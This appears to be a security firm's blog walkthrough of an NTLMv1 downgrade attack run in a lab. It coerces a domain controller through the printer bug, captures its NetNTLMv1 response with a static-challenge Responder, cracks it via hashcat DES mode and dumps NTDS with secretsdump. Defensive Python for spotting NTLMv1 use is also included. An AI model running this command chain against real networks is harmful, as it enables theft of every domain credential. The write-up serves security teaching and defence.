NTLMv1 Downgrade attack


Celia Catalán


NetNTLMv1 downgrade 

As discussed in previous posts, after forcing authentication and obtaining the NetNTLM hash of the victim machine account's password, there are mainly three different exploitation scenarios. This post covers the following one:

  • NetNTLMv1 downgrade  

In this scenario, the attacker takes advantage of the NetNTLMv1 authentication protocol still being accepted on the network.

For this authentication protocol to be abusable, the server vulnerable to “Coerce Authentication” must have the “LmCompatibilityLevel” registry value set to 2 or less.

This is the setting controlled by the group policy named “Network Security: LAN Manager Authentication Level”: choosing an option that sends LM and NTLM responses leaves the server able to answer with NetNTLMv1.
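From the defender's side, the same setting and its consequences can be checked rather than exploited. The following Python is an added example, not part of the original post: it maps the LmCompatibilityLevel values of that policy to whether a host still sends NetNTLMv1, and scans constructed 4624 logon records (the "Package Name (NTLM only)" field of the Security log) for logons that completed with LM or NTLM V1.

```python
import re

# "Network security: LAN Manager authentication level" maps to the
# LmCompatibilityLevel registry value; levels 0-2 still send LM/NTLMv1.
LEVELS = {
    0: "Send LM & NTLM responses",
    1: "Send LM & NTLM - use NTLMv2 session security if negotiated",
    2: "Send NTLM response only",
    3: "Send NTLMv2 response only",
    4: "Send NTLMv2 response only, refuse LM",
    5: "Send NTLMv2 response only, refuse LM & NTLM",
}


def allows_ntlmv1(level: int) -> bool:
    """True when a host at this level answers a challenge with NetNTLMv1."""
    if level not in LEVELS:
        raise ValueError(f"unknown LmCompatibilityLevel {level}")
    return level <= 2


# Constructed sample of Security log 4624/4625 records flattened to one
# "Field: value | ..." line each; only the fields used below are included.
SAMPLE_EVENTS = """\
Event ID: 4624 | Account Name: DC$ | Authentication Package: NTLM | Package Name (NTLM only): NTLM V1 | Source Network Address: 10.0.0.50
Event ID: 4624 | Account Name: bob | Authentication Package: NTLM | Package Name (NTLM only): NTLM V2 | Source Network Address: 10.0.0.21
Event ID: 4624 | Account Name: alice | Authentication Package: Kerberos | Package Name (NTLM only): - | Source Network Address: 10.0.0.22
Event ID: 4625 | Account Name: SVC$ | Authentication Package: NTLM | Package Name (NTLM only): NTLM V1 | Source Network Address: 10.0.0.51
"""

FIELD = re.compile(r"([^|:]+):\s*([^|]*)")


def parse_event(line: str) -> dict:
    """Split one flattened record into a field -> value dict."""
    return {k.strip(): v.strip() for k, v in FIELD.findall(line)}


def find_ntlmv1_logons(text: str) -> list:
    """(account, source address, package) for each successful logon (4624)
    that completed with LM or NTLM V1 instead of NTLM V2."""
    hits = []
    for line in text.splitlines():
        ev = parse_event(line)
        if ev.get("Event ID") != "4624":
            continue  # failed logons (4625) are not counted here
        if ev.get("Authentication Package") != "NTLM":
            continue  # Kerberos logons carry "-" in the package field
        pkg = ev.get("Package Name (NTLM only)", "")
        if pkg in ("NTLM V1", "LM"):
            hits.append((ev["Account Name"], ev["Source Network Address"], pkg))
    return hits
```

A machine account such as DC$ showing up with "NTLM V1" from an unexpected source address is exactly the trace the coercion described in this post leaves behind.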


Summary 

The exploitation process of this attack is briefly explained below: 

  1. Obtain a NetNTLMv1 response from the domain controller machine account by forcing authentication with any Coerce Authentication vulnerability. 
  2. Transform the NetNTLMv1 hash obtained into a format that can be cracked in DES mode. 
  3. Crack the different parts of the hash and obtain the DES key for each of them. 
  4. Transform the obtained DES keys to NTLM format. 
  5. Perform a DCSync to obtain the NTDS through Pass The Hash using the NTLM hash obtained in the previous steps. 

Test Laboratory Components 

Below we briefly describe the assets found in the testing laboratory: 

  • Attack_Machine – A Kali Linux machine from which the attack will be carried out: it triggers the “Coerce Authentication” and runs the software listening to obtain the machine account's hash in NetNTLMv1 format. 
  • DC.corp.lab – Domain controller for the domain “corp.lab”, which will be the victim of the attack. An unprivileged user named “Bob” is configured in that domain to emulate the attack from its compromise. This server has the group policy named above applied. 

Development of the attack 

Getting a NetNTLMv1 Response 

To begin the attack, we need to check whether the domain controller is vulnerable to any of the “Coerce Authentication” attacks explained “here”. In this case, the exploitation will be carried out by abusing the MS-RPC interface MS-RPRN using the Printer Bug script. 

You must check that the DC has that MS-RPC interface enabled using the following command: 


Terminal

    python3 rpcdump.py @dc.corp.lab | grep 'MS-RPRN'


After verifying that the domain controller is vulnerable to that “Coerce Authentication”, the attacker's machine must be configured. To do this, edit the configuration file of the software known as Responder as follows:


Terminal

    sudo nano /etc/responder/Responder.conf

    SMB = On
    HTTP = On
    ;Challenge = Random
    Challenge = 1122334455667788


Once the Responder configuration file has been edited, it must be run as follows so that it listens. The --lm flag forces a downgrade on certain versions of the operating system. 


Terminal

    sudo responder -I eth0 -wv --lm


Once “Responder” is running, the “Coerce Authentication” will be exploited.


Terminal

    python3 printerbug.py 'CORP/bob:password@dc.corp.lab' attack_machine


After forcing the domain controller's machine account to authenticate against the attacker's machine, the NetNTLMv1 hash of that account is obtained. 


Transform the NetNTLMv1 hash obtained into a format that can be cracked 

As mentioned, once the NetNTLMv1 hash is obtained, it must be transformed into a format that can be cracked in DES mode. To do this, the ntlmv1-multi tool is used; its output lists the steps needed to correctly crack the hash. 


Terminal

    python3 ntlmv1.py --ntlmv1 'hash ntlmv1'


As can be seen in the previous screenshot, the tool itself shows how to calculate the last 4 hex digits of the NTLM hash and provides both the hashes that must be cracked in DES format and the command that must be executed. 

Crack the different parts of the hash and obtain the DES keys of each of them 

Therefore, first, the last 4 hex digits of the NTLM hash are calculated as follows using a hashcat-utils tool:


Terminal

    /usr/lib/hashcat-utils/ct3_to_ntlm.bin 'output obtained with ntlmv1.py'


On the other hand, the two hashes provided by the ntlmv1-multi tool are cracked in DES mode (-m 14000) using the hashcat cracking tool with the following command: 


Terminal

    hashcat.exe -m 14000 -a 3 -1 charsets/DES_full.hcchr --hex-charset 'file with hashes' ?1?1?1?1?1?1?1?1


NOTE: In old versions of hashcat the charset file is called DES_FULL.charset; in current versions it is DES_full.hcchr. 

After the cracking process, you obtain the following DES keys: 

Transform the obtained DES keys to NTLM format: 

Once the two DES keys have been obtained, another hashcat-utils script must be used to transform these keys into NTLM format. 

Terminal

    /usr/lib/hashcat-utils/deskey_to_ntlm.pl 'cracked DES key 1'
    /usr/lib/hashcat-utils/deskey_to_ntlm.pl 'cracked DES key 2'

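The following Python is an added example, not part of the original post nor of the ntlmv1-multi or hashcat-utils tools. It shows the key layout behind the ct3_to_ntlm.bin and deskey_to_ntlm.pl steps above: the NT hash is zero-padded to 21 bytes and cut into three 7-byte DES keys, so the third key holds only two hash bytes (16 unknown bits, which is why its digits are computed rather than cracked), and a cracked 8-byte DES key carries a parity bit per byte that must be stripped to get hash bytes back. SAMPLE_NT_HASH is the well-known NT hash of the string "password", used only as sample input.

```python
# NTLMv1 response structure (MS-NLMP): the 16-byte NT hash is zero-padded to
# 21 bytes and cut into three 7-byte DES keys; each key encrypts the 8-byte
# server challenge and the three ciphertexts form the 24-byte response.
# Only the key handling is shown here; no DES encryption is performed.

# Well-known NT hash of the string "password", used only as sample input.
SAMPLE_NT_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
PADDING = 5  # zero bytes appended to the hash to reach 21 bytes


def split_nt_hash(nt_hash: bytes) -> list:
    """The three 7-byte DES keys a client derives from its NT hash."""
    if len(nt_hash) != 16:
        raise ValueError("NT hash must be 16 bytes")
    padded = nt_hash + b"\x00" * PADDING
    return [padded[i:i + 7] for i in (0, 7, 14)]


def unknown_bits(key_index: int) -> int:
    """Key bits that are not fixed padding: 56, 56 and only 16 for the
    third key, so its two hash bytes can be computed instead of cracked."""
    fixed = PADDING if key_index == 2 else 0
    return 8 * (7 - fixed)


def expand_des_key(key7: bytes) -> bytes:
    """Spread 56 key bits over 8 bytes with an odd parity bit in each byte;
    this is the form in which a DES cracker reports a recovered key."""
    bits = int.from_bytes(key7, "big")
    out = bytearray()
    for i in range(8):
        seven = (bits >> (49 - 7 * i)) & 0x7F
        parity = 0 if bin(seven).count("1") % 2 else 1
        out.append((seven << 1) | parity)
    return bytes(out)


def compress_des_key(key8: bytes) -> bytes:
    """Drop each parity bit and repack the 56 bits into 7 hash bytes
    (the direction deskey_to_ntlm.pl works in)."""
    bits = 0
    for b in key8:
        bits = (bits << 7) | (b >> 1)
    return bits.to_bytes(7, "big")


def rebuild_nt_hash(key1_8: bytes, key2_8: bytes, last_two: bytes) -> bytes:
    """Recombine two recovered 8-byte DES keys and the two computed trailing
    hash bytes into the 16-byte NT hash."""
    return compress_des_key(key1_8) + compress_des_key(key2_8) + last_two
```

The fixed padding is also why a static challenge such as 1122334455667788 is so damaging: with the challenge known in advance, the DES ciphertexts depend only on these key bytes.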

Perform a DCSync to obtain the NTDS using Pass The Hash:

After obtaining all parts of the domain controller machine account's NTLM hash, it is possible to perform a DCSync and obtain the domain's NTDS using impacket's secretsdump.py tool through a Pass The Hash attack: 

Terminal

    python3 secretsdump.py -just-dc-ntlm -hashes ':hash_ntlm' 'corp.lab/dc$@dc.corp.lab'



Dimas Pastor, Senior Analyst at Zerolynx Group.
